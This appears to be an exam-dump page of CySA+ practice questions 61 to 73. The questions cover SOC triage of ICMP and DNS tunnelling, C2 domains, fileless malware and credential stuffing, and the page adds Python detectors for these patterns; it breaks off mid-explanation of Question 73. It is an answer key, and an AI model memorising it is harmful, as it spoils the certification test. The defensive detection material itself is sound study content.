CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 5 Q61-75

Question 61

A SOC analyst identifies multiple endpoints sending continuous ICMP requests to external IP addresses that have no business relationship with the organization. The requests occur in bursts and occasionally include unusually large payloads. What is the most likely threat, and what should the immediate response be?

A) Normal network diagnostics; allow traffic.
B) Reconnaissance activity or ICMP-based tunneling by malware; isolate endpoints, capture traffic, and analyze payloads.
C) Misconfigured monitoring system; update configuration.
D) Temporary network testing; notify users.

Answer: B)

Explanation:

Option A assumes normal diagnostics. Routine ICMP traffic, such as ping tests or network troubleshooting, is predictable, typically originates from authorized systems, and uses standard payload sizes. Bursts of ICMP traffic with unusually large payloads to external, unknown IPs suggest malicious activity rather than routine diagnostics. Ignoring such activity could allow attackers to map the network or exfiltrate data covertly.

Option B is correct. ICMP is often leveraged by malware for reconnaissance, data exfiltration, or covert communication. Large and persistent ICMP payloads suggest tunneling, which can bypass traditional firewall and monitoring controls. Immediate SOC response should involve isolating affected endpoints to prevent further communication, capturing network traffic for analysis, and examining the payloads for signs of sensitive data transfer or malware commands. Endpoint forensics helps identify the processes responsible and potential persistence mechanisms. Analysts should cross-reference the external IPs with threat intelligence to determine if they are associated with known malicious infrastructure. Remediation involves cleaning infected endpoints, updating intrusion detection systems to detect similar ICMP tunneling behavior, and enhancing monitoring for anomalous ICMP traffic. Preserving evidence is critical for forensic analysis and incident reporting.

Option C proposes misconfigured monitoring. Misconfigurations rarely generate bursts of large ICMP packets to external IPs. Assuming this is benign misconfiguration could allow ongoing malicious activity to go undetected.

Option D assumes temporary network testing. Temporary testing is typically documented and predictable, and rarely involves large, repeated ICMP requests to unknown external systems. Treating this as legitimate testing could result in compromised network visibility.

Choosing option B ensures early detection and containment of potential reconnaissance or exfiltration attempts, protects sensitive data, and preserves evidence for further investigation and future threat detection improvements.
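To make the Option B reasoning concrete, here is an added detection example (not code from the page) that flags the two traits the scenario describes: bursts of echo requests from an internal host to an external address outside any approved range, and payloads far larger than a routine ping carries. The flow records, the approved and internal ranges, and the thresholds are all constructed assumptions.

```python
"""Flag ICMP echo traffic matching the Question 61 scenario: bursts of requests
from internal hosts to unapproved external IPs, and unusually large payloads.
Added illustration; the flow records, ranges and thresholds are constructed."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Assumption: the only external range ICMP is expected to reach (e.g. an ISP probe).
APPROVED_EXTERNAL = [ip_network("203.0.113.0/24")]
INTERNAL = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Constructed sample flow records: (epoch_seconds, src, dst, icmp_type, payload_bytes)
SAMPLE_FLOWS = [
    (1000, "10.1.1.5", "203.0.113.10", 8, 56),      # routine ping to the approved range
    (1001, "10.1.1.5", "203.0.113.10", 8, 56),
    (2000, "10.1.1.9", "198.51.100.77", 8, 1400),   # burst of large echo requests
    (2001, "10.1.1.9", "198.51.100.77", 8, 1400),
    (2002, "10.1.1.9", "198.51.100.77", 8, 1380),
    (2003, "10.1.1.9", "198.51.100.77", 8, 1400),
    (2004, "10.1.1.9", "198.51.100.77", 8, 1400),
    (3000, "10.1.1.7", "198.51.100.9", 8, 64),      # one small echo; below both thresholds
]


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL)


def is_approved(ip):
    addr = ip_address(ip)
    return any(addr in net for net in APPROVED_EXTERNAL)


def detect_icmp_anomalies(flows, window_s=10, burst_count=5, max_payload=128):
    """Return one alert per (src, dst) pair that either sends >= burst_count
    echo requests within window_s seconds to an unapproved external host, or
    sends any echo request whose payload exceeds max_payload bytes.
    Thresholds are assumed values; tune them to the environment's baseline."""
    by_pair = defaultdict(list)
    for ts, src, dst, icmp_type, size in sorted(flows):
        # Keep only echo requests (type 8) leaving the internal ranges for
        # destinations that are not on the approved list.
        if icmp_type != 8 or not is_internal(src) or is_internal(dst) or is_approved(dst):
            continue
        by_pair[(src, dst)].append((ts, size))

    alerts = []
    for (src, dst), pkts in by_pair.items():
        reasons = set()
        start = 0
        for end in range(len(pkts)):           # sliding window over timestamps
            while pkts[end][0] - pkts[start][0] > window_s:
                start += 1
            if end - start + 1 >= burst_count:
                reasons.add("burst")
        largest = max(size for _, size in pkts)
        if largest > max_payload:
            reasons.add("large_payload")
        if reasons:
            alerts.append({"src": src, "dst": dst, "packets": len(pkts),
                           "max_payload": largest, "reasons": sorted(reasons)})
    return alerts
```

An alert carrying both reasons is the case the question describes; the next step is a packet capture of that pair so the payloads themselves can be examined.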

Question 62

A SOC analyst observes multiple endpoints repeatedly querying a set of domains that were registered within the past 24 hours. The queries are low volume but highly frequent, and the domains have no reputation history. What is the most likely scenario, and what is the recommended response?

A) Normal DNS caching activity; allow traffic.
B) Malware using newly registered domains for command-and-control; capture DNS traffic, isolate endpoints, and analyze for malware.
C) Misconfigured DNS server; update configuration.
D) Routine cloud service queries; verify vendor.

Answer: B)

Explanation:

Option A assumes normal DNS caching behavior. DNS caching results in predictable query patterns for frequently accessed domains, generally not for newly registered domains with no history. Highly frequent queries to brand-new domains are anomalous and should be investigated. Ignoring this may allow malware communication with external command-and-control servers.

Option B is correct. Attackers often register new domains for command-and-control (C2) infrastructure to avoid detection. Malware will query these domains to receive instructions or exfiltrate data. Indicators include newly registered domains, low-volume but persistent queries, and no legitimate reputation. Immediate response involves capturing DNS traffic to analyze which endpoints are communicating, isolating affected endpoints to prevent further communication, and conducting malware analysis to identify processes responsible. Cross-referencing the domains with threat intelligence may reveal connections to known campaigns. Remediation includes cleaning infected systems, updating DNS security policies, and enhancing monitoring to detect similar suspicious domains. Preserving evidence supports forensic analysis and helps strengthen detection capabilities.

Option C suggests misconfigured DNS servers. Misconfigurations typically result in failed queries or unusual error patterns, not persistent communication with newly registered domains. Treating this as a configuration issue could allow malware to continue communicating undetected.

Option D assumes routine cloud service queries. Legitimate services use known domains with established reputations. Frequent queries to new, untrusted domains are inconsistent with normal cloud operations.

Selecting option B ensures proactive containment, analysis, and remediation of malware using novel infrastructure while protecting sensitive data and maintaining network integrity.

Question 63

A SOC analyst notices multiple endpoints executing scripts that modify firewall rules to allow outbound connections to previously blocked IP addresses. The scripts are obfuscated, execute under elevated privileges, and disable logging of network events. What is the most likely threat, and what is the immediate action?

A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass network defenses and exfiltrate data; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured security policy; update firewall rules.
D) User testing new scripts; notify users.

Answer: B)

Explanation:

Option A assumes routine administration. Administrative scripts are usually signed, documented, and predictable. Modifying firewall rules to allow previously blocked connections, disabling logging, and running obfuscated scripts under elevated privileges indicates malicious activity. Ignoring this could lead to unmonitored data exfiltration or attacker persistence.

Option B is correct. Malware often modifies firewall rules to evade detection and facilitate communication with external servers for command-and-control or data exfiltration. Indicators include script obfuscation, elevated privileges, and log suppression. Immediate SOC response involves isolating affected endpoints to prevent further unauthorized communication, capturing memory for forensic analysis to identify active processes and scripts, and analyzing scripts to understand the method and intent of the attack. Network traffic analysis helps determine external targets and identify exfiltrated data. Threat intelligence may reveal known infrastructure associated with the malware. Remediation involves cleaning endpoints, restoring security and logging services, and updating firewall rules and detection systems to prevent recurrence. Evidence preservation ensures a comprehensive forensic investigation and supports incident reporting and regulatory compliance.

Option C suggests misconfigured security policies. Misconfigurations typically do not involve obfuscated scripts or deliberate log suppression. Assuming this is a benign configuration issue could result in continued compromise.

Option D assumes user testing. Legitimate testing is usually documented and does not involve disabling logs or bypassing established firewall rules. Ignoring this behavior could result in undetected malicious activity.

Selecting option B ensures early detection and mitigation of malware attempting to evade security controls, preserving evidence and protecting sensitive systems.

Question 64

A SOC analyst identifies Windows endpoints creating new scheduled tasks that execute external scripts during off-hours. The scripts attempt to disable antivirus services and obfuscate execution commands. What is the most likely threat, and what is the recommended response?

A) Routine administrative automation; allow.
B) Fileless malware establishing persistence and evading security detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct scripts.
D) User-initiated testing; notify users.

Answer: B)

Explanation:

Option A assumes normal administrative automation. Typical administrative tasks are documented, predictable, and do not disable antivirus or obfuscate execution. Allowing off-hours obfuscated scripts that tamper with security services could facilitate persistent malware presence.

Option B is correct. Fileless malware often leverages scheduled tasks to maintain persistence and evade endpoint detection. Indicators include off-hours execution, obfuscated code, and attempts to disable security software. Immediate SOC response includes isolating affected endpoints to prevent further compromise, capturing memory to analyze in-memory execution, and examining scripts to understand attacker intent, persistence mechanisms, and potential command-and-control communication. Correlating network traffic identifies external connections, and threat intelligence helps determine whether infrastructure is associated with known malware campaigns. Remediation involves cleaning endpoints, restoring disabled security services, updating detection rules, and monitoring the environment for similar activity. Preserving forensic evidence ensures comprehensive investigation and supports security improvement efforts.

Option C suggests misconfigured tasks. Misconfigurations rarely include obfuscation, external downloads, or security service tampering. Assuming benign misconfiguration risks undetected malware activity.

Option D assumes user testing. Legitimate testing is typically documented and does not involve disabling security controls or obfuscated scripts. Ignoring this could lead to persistent malware activity.

Selecting option B prioritizes containment, investigation, and remediation while preserving forensic evidence and improving detection of advanced threats.

Question 65

A SOC analyst observes Linux endpoints making persistent outbound connections over non-standard TCP ports to external IPs. System logs show execution of unexpected processes, and connections occur continuously outside normal operational hours. What is the most likely threat, and what should the SOC do first?

A) Routine system administration; allow.
B) Covert command-and-control communication or exfiltration by malware; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured automation; correct scripts.
D) Monitoring software; verify with vendor.

Answer: B)

Explanation:

Option A assumes routine administration. Normal administrative activity is predictable, occurs on standard ports, originates from known systems, and aligns with maintenance schedules. Continuous connections over non-standard ports by unexpected processes suggest malicious activity. Allowing this could result in ongoing exfiltration or unauthorized remote control.

Option B is correct. Persistent outbound connections over non-standard ports often indicate malware establishing command-and-control channels or exfiltrating sensitive information. Indicators include continuous activity outside normal hours, unusual processes initiating connections, and targeting unknown external IPs. Immediate SOC action includes isolating affected endpoints to prevent further compromise, capturing network traffic for analysis to determine external endpoints, and analyzing processes for malware behavior. Cross-referencing IPs with threat intelligence helps identify malicious infrastructure. Remediation involves cleaning infected endpoints, updating detection systems, strengthening firewall rules, and monitoring for similar activity across the network. Preserving forensic evidence ensures accurate threat analysis, reporting, and post-incident review.

Option C suggests misconfigured automation. Misconfigurations rarely result in persistent connections to unknown external IPs over non-standard ports. Assuming benign misconfiguration could allow attackers to maintain access.

Option D proposes monitoring software. Legitimate monitoring is predictable and uses known servers and standard ports. The observed continuous connections over non-standard ports are inconsistent with normal monitoring.

Selecting option B ensures proactive containment, forensic analysis, and remediation, protecting endpoints from persistent threats and maintaining operational integrity.

Question 66

A SOC analyst identifies endpoints making repeated outbound HTTPS connections to domains that have been registered within the last 48 hours. The traffic volume is low, and the endpoints execute scripts that dynamically generate the requests. What is the most likely threat, and what should the SOC do first?

A) Normal application updates; allow traffic.
B) Malware using newly registered domains for command-and-control; capture traffic, isolate endpoints, and analyze scripts.
C) Misconfigured web application; update settings.
D) Legitimate testing of cloud services; notify users.

Answer: B)

Explanation:

Option A assumes normal updates. Application updates are typically predictable, connect to known vendor domains, and rarely occur continuously with dynamically generated requests. Ignoring low-volume but frequent HTTPS traffic to newly registered domains risks missing malware communication.

Option B is correct. Attackers frequently register new domains to host command-and-control infrastructure and avoid reputation-based detection. Indicators include newly registered domains, low-volume but persistent connections, dynamically generated requests from scripts, and lack of legitimate documentation. Immediate SOC response includes isolating affected endpoints to prevent further outbound communication, capturing HTTPS traffic for analysis, and examining scripts for command-and-control behavior. Analyzing traffic patterns can reveal data exfiltration attempts or malware instructions. Threat intelligence can determine whether these domains are associated with known campaigns. Remediation involves cleaning affected endpoints, updating detection rules to recognize similar C2 behavior, and monitoring other endpoints for anomalous traffic. Preserving forensic evidence is critical for incident investigation and future prevention.

Option C suggests misconfigured web applications. Misconfigurations generally do not create persistent, scripted outbound connections to newly registered external domains. Treating this as benign misconfiguration risks undetected malware activity.

Option D assumes legitimate testing. Testing activity is usually documented and predictable. Unplanned, low-volume, off-hours HTTPS requests to new domains are unlikely to be legitimate.

Selecting option B ensures proactive containment, forensic analysis, and mitigation of malware attempting to use new infrastructure for command-and-control or data exfiltration.

Question 67

A SOC analyst observes Windows endpoints creating new scheduled tasks that download scripts from untrusted sources, obfuscate execution commands, and attempt to disable logging services. What is the most likely threat, and what is the recommended response?

A) Routine administrative automation; allow execution.
B) Fileless malware establishing persistence and evading detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct configuration.
D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine automation. Legitimate administrative scripts are typically documented, predictable, and signed. Disabling logging services and downloading external scripts with obfuscated commands indicates malicious activity. Ignoring this could allow persistent malware presence and exfiltration.

Option B is correct. Fileless malware often leverages scheduled tasks for persistence while evading endpoint detection systems. Key indicators include off-hours execution, obfuscation, external downloads, and log tampering. Immediate response involves isolating affected endpoints to prevent lateral movement, capturing memory to analyze in-memory execution and running processes, and examining scripts for malicious activity. Network traffic analysis identifies potential command-and-control communication. Threat intelligence may identify known infrastructure or malware families. Remediation involves cleaning endpoints, restoring security services, updating detection rules, and monitoring for similar activity in the environment. Evidence preservation ensures thorough forensic investigation, supports regulatory reporting, and improves future threat detection capabilities.

Option C suggests misconfigured automation tasks. Misconfigurations rarely involve obfuscation, log tampering, or external downloads. Treating this as benign misconfiguration risks ongoing malware activity.

Option D assumes user testing. Legitimate testing is documented, occurs under authorized accounts, and does not involve disabling logging or executing obfuscated scripts.

Selecting option B ensures containment, investigation, and remediation of advanced threats while preserving evidence and enhancing future detection.

Question 68

A SOC analyst notices Linux endpoints performing repeated failed login attempts on administrative cloud accounts from IP addresses across multiple countries. These attempts target several high-privilege accounts and continue outside business hours. What is the most likely threat, and what should the SOC do first?

A) User mistyping credentials; notify users.
B) Credential-stuffing attacks; block IPs, enforce MFA, and audit account activity.
C) Legitimate mobile logins; allow.
D) Misconfigured cloud services; adjust settings.

Answer: B)

Explanation:

Option A assumes user errors. Occasional mistyped passwords are normal, but repeated failed login attempts from global IP addresses targeting multiple administrative accounts indicate malicious intent. Ignoring this could result in compromised accounts and unauthorized access.

Option B is correct. Credential-stuffing attacks involve attackers using stolen credentials or guessing passwords to access high-privilege accounts. Immediate mitigation includes blocking offending IP addresses, enabling multi-factor authentication, auditing account logs for successful and failed attempts, and monitoring for abnormal activity. Threat intelligence may reveal known attack infrastructure. Following mitigation, accounts should be reset, strong password policies enforced, and user access validated to prevent future compromise. This approach minimizes risk, secures high-value accounts, and supports continuous monitoring for anomalous behavior.

Option C assumes legitimate mobile logins. Legitimate access is typically from recognized devices, IP ranges, and predictable locations. Multiple failed login attempts from international IPs are inconsistent with normal behavior.

Option D suggests cloud misconfiguration. Misconfigurations do not generate repeated failed login attempts across multiple IPs and accounts. Assuming a configuration issue risks overlooking an active attack.

Choosing option B ensures rapid containment, secures administrative access, and strengthens overall cloud account security posture.
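The audit step in Option B is easier to reason about with a worked example. The following added code (not from the page) scans constructed sign-in events for the pattern in the question, failures against several administrative accounts from IPs in multiple countries, and also surfaces the check an analyst most needs during the audit: whether any of those IPs later logged in successfully. The account list, events, window and thresholds are assumptions.

```python
"""Spot the Question 68 pattern: repeated failed logins against administrative
accounts from IPs in many countries, then list the IPs to block and any
success that followed from one of them. Added illustration; the events,
account list and thresholds are constructed assumptions."""
from collections import defaultdict

ADMIN_ACCOUNTS = {"cloud-admin", "iam-root", "billing-admin"}   # assumed privileged set

# Constructed sample events: (epoch_seconds, account, source_ip, geo_country, outcome)
SAMPLE_EVENTS = [
    (100, "cloud-admin", "198.51.100.4", "BR", "FAIL"),
    (105, "cloud-admin", "203.0.113.9", "RU", "FAIL"),
    (110, "cloud-admin", "192.0.2.77", "NG", "FAIL"),
    (115, "cloud-admin", "198.51.100.4", "BR", "FAIL"),
    (120, "iam-root", "203.0.113.9", "RU", "FAIL"),
    (125, "iam-root", "192.0.2.77", "NG", "FAIL"),
    (130, "iam-root", "198.51.100.200", "VN", "FAIL"),
    (135, "billing-admin", "192.0.2.77", "NG", "FAIL"),
    (140, "billing-admin", "192.0.2.77", "NG", "SUCCESS"),   # one of the tried pairs worked
    (500, "jdoe", "10.20.30.40", "US", "FAIL"),               # an ordinary mistyped password
    (505, "jdoe", "10.20.30.40", "US", "SUCCESS"),
]


def analyze_logins(events, window_s=600, min_failures=3, min_countries=2,
                   min_accounts_per_ip=2):
    """Return a dict with three views of the same events:
      flagged_accounts: accounts with >= min_failures failures inside window_s
                        seconds coming from >= min_countries countries
      block_ips:        IPs that failed against >= min_accounts_per_ip accounts,
                        plus every IP seen in a flagged account's window
      suspicious_successes: successful logins from an IP in block_ips, i.e.
                        the accounts that need an immediate reset"""
    fails_by_account = defaultdict(list)
    failed_accounts_by_ip = defaultdict(set)
    successes = []
    for ts, acct, ip, country, outcome in events:
        if outcome == "FAIL":
            fails_by_account[acct].append((ts, ip, country))
            failed_accounts_by_ip[ip].add(acct)
        elif outcome == "SUCCESS":
            successes.append((ts, acct, ip))

    # IPs that tried several different accounts, regardless of per-account counts.
    attacker_ips = {ip for ip, accts in failed_accounts_by_ip.items()
                    if len(accts) >= min_accounts_per_ip}

    flagged = {}
    for acct, fails in fails_by_account.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):            # sliding window over failures
            while fails[end][0] - fails[start][0] > window_s:
                start += 1
            window = fails[start:end + 1]
            countries = {c for _, _, c in window}
            if len(window) >= min_failures and len(countries) >= min_countries:
                flagged[acct] = {"failures": len(window),
                                 "countries": sorted(countries),
                                 "privileged": acct in ADMIN_ACCOUNTS}
                attacker_ips.update(ip for _, ip, _ in window)

    suspicious = [(acct, ip) for _, acct, ip in sorted(successes) if ip in attacker_ips]
    return {"flagged_accounts": flagged, "block_ips": attacker_ips,
            "suspicious_successes": suspicious}
```

In the sample, billing-admin never reaches the per-account failure threshold, yet the success from an IP that already failed against two other accounts is exactly what the audit should catch.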

Question 69

A SOC analyst observes endpoints accessing rarely used network shares during off-hours, reading portions of files, and attempting unauthorized writes. What is the most likely threat, and what is the immediate response?

A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; update configuration.
D) Legitimate off-hours user activity; notify users.

Answer: B)

Explanation:

Option A assumes backup activity. Backups typically access full files at scheduled times, involve known accounts, and follow predictable patterns. Accessing portions of files and attempting unauthorized writes indicates suspicious activity rather than routine backup. Allowing this could enable malware to propagate or gather sensitive information.

Option B is correct. Malware often performs lateral movement by accessing network shares to discover data and permissions. Indicators include rare share access, partial file reads, unauthorized writes, and activity outside normal hours. Immediate response involves isolating affected endpoints to prevent further compromise, reviewing file access logs to determine what resources were targeted, and performing endpoint analysis to identify malware or scripts facilitating movement. Remediation involves cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures incident investigation and helps refine detection capabilities.

Option C suggests misconfigured scheduled tasks. Misconfigurations usually impact a limited scope and do not create suspicious patterns across multiple endpoints. Treating this as benign misconfiguration risks persistent malware activity.

Option D assumes legitimate off-hours activity. Users rarely access unused shares and attempt unauthorized writes during off-hours. Ignoring this could allow malware reconnaissance and movement to continue.

Selecting option B ensures early detection, containment, and remediation, protecting sensitive data while maintaining network integrity.

Question 70

A SOC analyst observes endpoints executing scripts that download files from untrusted external servers directly in memory. No disk artifacts are left, and antivirus has not detected any threats. What is the most likely scenario, and what should the SOC do first?

A) Routine software installation; allow execution.
B) Fileless malware leveraging memory execution; isolate endpoints, perform memory forensics, and analyze scripts.
C) Misconfigured automation scripts; correct scripts.
D) Legitimate patching process; verify with administrator.

Answer: B)

Explanation:

Option A assumes software installation. Legitimate software installation uses signed binaries, leaves disk artifacts, and follows predictable procedures. Running untrusted scripts entirely in memory is highly suspicious and inconsistent with standard IT operations. Ignoring this may allow fileless malware to persist undetected.

Option B is correct. Fileless malware executes primarily in memory, avoiding traditional endpoint detection mechanisms. Indicators include downloading from untrusted servers, memory-based execution, lack of disk artifacts, and absence of antivirus alerts. Immediate response involves isolating endpoints to prevent lateral movement, performing memory forensics to capture running processes and injected code, and analyzing scripts to identify malware behavior and potential command-and-control communication. Network analysis can identify attacker infrastructure. Remediation involves cleaning endpoints, updating detection mechanisms, and monitoring other endpoints for similar activity. Preserving evidence is critical for forensic analysis, regulatory compliance, and improving detection capabilities.

Option C suggests misconfigured scripts. Misconfigurations rarely result in memory-only execution and external downloads. Treating this as benign risks persistence of malware.

Option D assumes legitimate patching. Patching is predictable, documented, and does not involve memory-only execution of untrusted files.

Selecting option B ensures containment, investigation, and remediation of sophisticated memory-based threats while preserving forensic evidence and improving future detection.

Question 71

A SOC analyst identifies endpoints sending low-volume, persistent outbound traffic over unusual ports to multiple external IP addresses. The traffic occurs outside business hours and is encrypted. Antivirus has not flagged any threats. What is the most likely threat, and what should the SOC do first?

A) Normal application updates; allow traffic.
B) Malware establishing covert command-and-control channels; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured firewall rules; update configuration.
D) Routine cloud service synchronization; verify vendor.

Answer: B)

Explanation:

Option A assumes normal updates. Application updates are predictable, use standard ports, and connect to known vendor servers. Low-volume, persistent encrypted traffic over unusual ports to unknown IPs outside business hours is inconsistent with routine updates and may indicate malicious activity. Ignoring this could allow attackers to maintain covert control or exfiltrate data.

Option B is correct. Malware often uses non-standard ports and encrypted channels to evade detection while maintaining command-and-control communications. Indicators include off-hour activity, low-volume persistent traffic, unknown external destinations, and lack of antivirus alerts. Immediate response involves isolating affected endpoints to prevent further compromise, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify processes and scripts responsible. Network analysis can reveal potential data exfiltration or attacker commands. Threat intelligence may identify the external infrastructure. Remediation involves cleaning compromised endpoints, updating detection rules for anomalous outbound traffic, monitoring other systems, and improving controls to prevent recurrence. Preserving forensic evidence ensures a complete understanding of attacker techniques and supports regulatory reporting.

Option C suggests misconfigured firewall rules. Misconfigurations usually result in blocked or failed connections, not continuous encrypted communication to multiple unknown IPs. Assuming benign misconfiguration could allow persistent compromise.

Option D assumes routine cloud synchronization. Legitimate cloud synchronization typically uses known domains, standard ports, and scheduled intervals. Observed activity is inconsistent with normal operations.

Selecting option B ensures early detection, containment, and remediation of covert malware communications while preserving evidence for analysis and improving future detection.

Question 72

A SOC analyst observes multiple Linux endpoints repeatedly performing DNS queries to newly registered domains. The queries include unusually long subdomains with encoded information. What is the most likely threat, and what is the recommended response?

A) Normal DNS resolution; allow.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured internal DNS servers; update configuration.
D) Antivirus telemetry using DNS; verify vendor.

Answer: B)

Explanation:

Option A assumes normal DNS resolution. Legitimate DNS queries involve known domains and meaningful hostnames. Queries to new domains with encoded, unusually long subdomains are anomalous. Ignoring this could allow attackers to exfiltrate sensitive data.

Option B is correct. DNS tunneling is a technique to bypass security controls and transmit data covertly. Indicators include newly registered domains, encoded subdomains, and queries outside business hours. Immediate SOC response involves capturing DNS traffic to analyze encoded payloads, isolating affected endpoints to prevent further exfiltration, and conducting endpoint forensics to identify responsible processes. Analysts should correlate DNS activity with SIEM logs to identify affected accounts or data. Threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning endpoints, updating detection rules for DNS tunneling patterns, and monitoring other systems for similar activity. Preserving forensic evidence supports analysis, reporting, and improved future defenses.

Option C suggests that unusual network activity could be attributed to misconfigured DNS servers. DNS misconfigurations, such as incorrect forwarding settings, stale cache entries, or improperly configured zones, can indeed cause unexpected queries or resolution failures. Typically, these misconfigurations result in easily identifiable patterns, such as repeated attempts to resolve internal or external hostnames, delayed responses, or error logs indicating failed lookups. Administrators can usually trace these issues back to specific configuration errors or recent changes, allowing remediation without extensive disruption.

However, the activity described in this scenario, frequent encoded queries to newly registered domains, does not align with the expected behavior of misconfigured DNS servers. Misconfigurations rarely produce queries that are intentionally obfuscated, encoded, or directed at domains that have only recently been registered. Encoded DNS queries are often used by malicious actors to exfiltrate data, bypass network monitoring, or communicate covertly with command-and-control servers. These queries can encode sensitive information in subdomain labels or other DNS fields, enabling persistent, low-profile data leakage without triggering traditional intrusion detection systems. Similarly, targeting newly registered domains is a common tactic in attacks, as these domains are less likely to be blacklisted or recognized by security tools, making them ideal for establishing stealthy communication channels.

Treating such behavior as benign, based on the assumption of misconfiguration, introduces substantial risk. Malicious actors rely on precisely this type of misclassification to maintain persistence and continue exfiltration over extended periods. Ignoring encoded, anomalous DNS queries allows attackers to retain access, move laterally across the network, or systematically siphon sensitive data. Unlike ordinary DNS misconfigurations, which are usually limited in scope and impact, malicious DNS activity is deliberate, adaptive, and designed to evade detection while extracting maximum value.

Effective response requires careful verification. Security teams should analyze DNS query patterns, identify unusual domain registrations, decode suspicious queries, and correlate them with endpoint activity and other indicators of compromise. This approach differentiates between benign misconfigurations and deliberate malicious activity, enabling targeted mitigation such as blocking suspicious domains, isolating affected systems, and strengthening network monitoring.

While misconfigured DNS servers can cause resolution anomalies, frequent, encoded queries to newly registered domains are highly inconsistent with ordinary misconfigurations. Assuming this activity is benign leaves the organization exposed to persistent risks, including data exfiltration and network compromise, which highlights the necessity of careful analysis and prompt remediation to maintain network security.

Option D assumes antivirus telemetry. Telemetry typically uses known domains, is predictable, and does not involve long encoded subdomains. Observed behavior is inconsistent with legitimate telemetry.

Selecting option B ensures containment, analysis, and remediation of covert exfiltration techniques while protecting sensitive data.
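Questions 62, 66 and 72 all turn on the same two DNS signals: persistent queries to domains registered only a day or two earlier, and subdomain labels that are long and high-entropy because they carry encoded data. The added example below (not the page's code) runs both checks over a constructed query log with a constructed domain-age table standing in for a WHOIS or passive-DNS feed; the registrable-domain split, the "today" date and the thresholds are simplifying assumptions.

```python
"""Flag DNS query patterns from Questions 62, 66 and 72: persistent queries to
newly registered domains and long, encoded subdomains typical of tunnelling.
Added illustration; the log, the registration feed and thresholds are
constructed assumptions."""
import math
from collections import Counter, defaultdict
from datetime import date

# Constructed stand-in for a domain-age feed (WHOIS or passive DNS in practice).
REGISTERED_ON = {
    "example-cdn.com": date(2015, 3, 1),
    "upd-sync-7731.net": date(2024, 6, 1),    # registered the day before the log
    "zx9-telemetry.org": date(2024, 6, 1),
}
TODAY = date(2024, 6, 2)   # assumed "now" for the age calculation

# Constructed query log: "<epoch> <client_ip> <qname> <qtype>". The hex labels
# are random-looking filler, not real data.
SAMPLE_LOG = """\
1717300000 10.1.1.20 www.example-cdn.com A
1717300005 10.1.1.20 static.example-cdn.com A
1717300010 10.1.1.31 a1.upd-sync-7731.net A
1717300070 10.1.1.31 a1.upd-sync-7731.net A
1717300130 10.1.1.31 a1.upd-sync-7731.net A
1717300190 10.1.1.31 a1.upd-sync-7731.net A
1717300200 10.1.1.44 3f9a0c71e4b2d8065a1f7c3e9b2d4f08.zx9-telemetry.org TXT
1717300205 10.1.1.44 b7e21c904d6f8a35e0c1b9d47f28a6e3.zx9-telemetry.org TXT
1717300210 10.1.1.44 5d0e8f2a97c3b1646ae2f9d30b7c4185.zx9-telemetry.org TXT
"""


def shannon_entropy(s):
    """Bits per character; encoded or random labels score well above hostnames."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Return (subdomain, registrable_domain). Simplifying assumption: the
    registrable domain is the last two labels. Production code should use the
    Public Suffix List, since names like example.co.uk break this rule."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        records.append((int(ts), client, qname, qtype))
    return records


def domain_age_days(domain, today=TODAY):
    registered = REGISTERED_ON.get(domain)
    return None if registered is None else (today - registered).days


def analyze_dns(records, max_age_days=2, min_queries=4, min_sub_len=24, min_entropy=3.0):
    """One alert per (client, registrable domain) with any of these reasons:
    newly_registered (age <= max_age_days), persistent (>= min_queries from
    the client) or encoded_subdomain (a subdomain at least min_sub_len chars
    long with entropy >= min_entropy bits per char)."""
    per_pair = defaultdict(list)
    for ts, client, qname, qtype in records:
        sub, dom = split_qname(qname)
        per_pair[(client, dom)].append((ts, sub, qtype))

    alerts = []
    for (client, dom), qs in per_pair.items():
        reasons = set()
        age = domain_age_days(dom)
        if age is not None and age <= max_age_days:
            reasons.add("newly_registered")
        if len(qs) >= min_queries:
            reasons.add("persistent")
        for _, sub, _ in qs:
            if len(sub) >= min_sub_len and shannon_entropy(sub) >= min_entropy:
                reasons.add("encoded_subdomain")
                break
        if reasons:
            alerts.append({"client": client, "domain": dom, "queries": len(qs),
                           "unique_names": len({s for _, s, _ in qs}),
                           "reasons": sorted(reasons)})
    return alerts
```

The unique_names count is worth watching separately: tunnelling produces a fresh subdomain per query, so it climbs with the query count, whereas a beaconing client repeats the same name.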

Question 73

A SOC analyst detects Windows endpoints executing obfuscated PowerShell scripts that modify registry keys, disable antivirus services, and initiate outbound communication to unknown IPs. No alerts were generated by endpoint security. What is the most likely threat, and what is the recommended response?

A) Routine administrative scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation scripts; correct scripts.
D) User testing scripts; notify users.

Answer: B)

Explanation:

Option A assumes legitimate administration. Administrative scripts are typically signed, documented, and predictable. Obfuscation, registry modifications, antivirus disabling, and communication to unknown IPs suggest malicious activity. Ignoring this could allow persistent malware and unauthorized access.

